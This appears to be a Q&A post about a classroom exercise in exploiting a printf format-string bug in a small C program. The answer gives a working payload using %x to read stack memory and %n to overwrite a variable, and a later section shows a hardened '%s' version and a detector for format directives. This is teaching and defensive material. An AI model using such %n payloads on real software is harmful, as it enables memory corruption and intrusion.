As part of an assignment, I am expected to exploit the printf() vulnerability in the C code shared below. It should be in a way that when I run the code with a string (e.g. ./format "foo"), I should change the "1" in "X equals to 1" to something else. I believe I need to change the value of the x variable, but if you have a different idea, please do not hesitate to share. Here is the code:
#include <stdio.h>
#include <stdlib.h>

int main (int argc, char **argv)
{
    int *p;
    int x = 1;
    p = &x;
    if (argc < 2) {          /* avoid handing a NULL pointer to printf when no argument is given */
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    printf("x=%d, sizeof(x): %zu, &x = %p, sizeof((p):%zu,&p = %p, \n", x, sizeof(x), (void *)&x, sizeof(p), (void *)&p);
    printf(argv[1]);         /* user input used directly as the format string: this is the vulnerability */
    printf("\nX equals: %d \n", x);
    return 0;
}
You can find pretty decent information (Format string attack) about vulnerabilities in printf when validation is not used properly.
I played a little with it, and running the program like this:
./format "Bob %x %x %x %x %x %x %x %x%n"
will produce the following output:
x=1, sizeof(x): 4, &x = 0x7fffa9c36e14, sizeof((p):8,&p = 0x7fffa9c36e18,
Bob 81688000 81464ab0 3 81688048 3 a9c36f08 400410 a9c36f00
X equals: 59
If you replace the %n with %x you will be able to see the address of the variable x. Because %x reads from the process memory and %n writes to the process memory, I was able to change the data inside of x (59 is the number of characters up to %n when printing).
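The fix for the bug the answer describes is to never let user input become the format string. The following example is added here and is not code from the question or the answer: it echoes the untrusted argument through a fixed "%s" format, so any %x or %n in the input is printed as ordinary text and cannot read or write process memory, and it adds a small helper that counts conversion directives in an input string, which is handy for spotting format-string probes in logs. The function names (echo_untrusted, count_directives, run_hardened) and the sample input are assumptions made for this example. Compiling the original program with gcc -Wformat -Wformat-security also warns about the non-literal format string in printf(argv[1]).

```c
#include <stdio.h>
#include <string.h>

/* Hardened replacement for printf(argv[1]): the user string is passed as a
 * data argument to a fixed format, so "%x" or "%n" inside it is copied
 * literally and never interpreted as a conversion. Returns the number of
 * characters that the formatted string has (snprintf's return value). */
int echo_untrusted(char *out, size_t out_len, const char *user) {
    return snprintf(out, out_len, "%s", user);
}

/* Count conversion directives in a string. "%%" is an escaped percent sign
 * and is not counted. A high count in a command-line argument or log field
 * is a cheap signal that someone is probing for a format-string bug. */
int count_directives(const char *s) {
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* skip the escaped "%%" */
        n++;
    }
    return n;
}

/* Mirrors the program from the question but uses the hardened echo.
 * Because x is never handed to printf as a %n target, it stays 1 no matter
 * what the input contains. Returns the value of x after the echo. */
int run_hardened(const char *user_input) {
    int x = 1;
    char buf[256];
    echo_untrusted(buf, sizeof buf, user_input);
    return x;
}

int main(int argc, char **argv) {
    /* constructed sample input, the same string the answer used */
    const char *input = argc > 1 ? argv[1] : "Bob %x %x %x %x %x %x %x %x%n";
    char buf[256];
    echo_untrusted(buf, sizeof buf, input);
    printf("%s\n", buf);
    printf("directives in input: %d, x after run: %d\n",
           count_directives(input), run_hardened(input));
    return 0;
}
```

With the sample input the program prints the string back unchanged, reports 9 directives, and shows x still equal to 1; the same input fed to the original program rewrites x, which is exactly the difference between a format argument and a data argument.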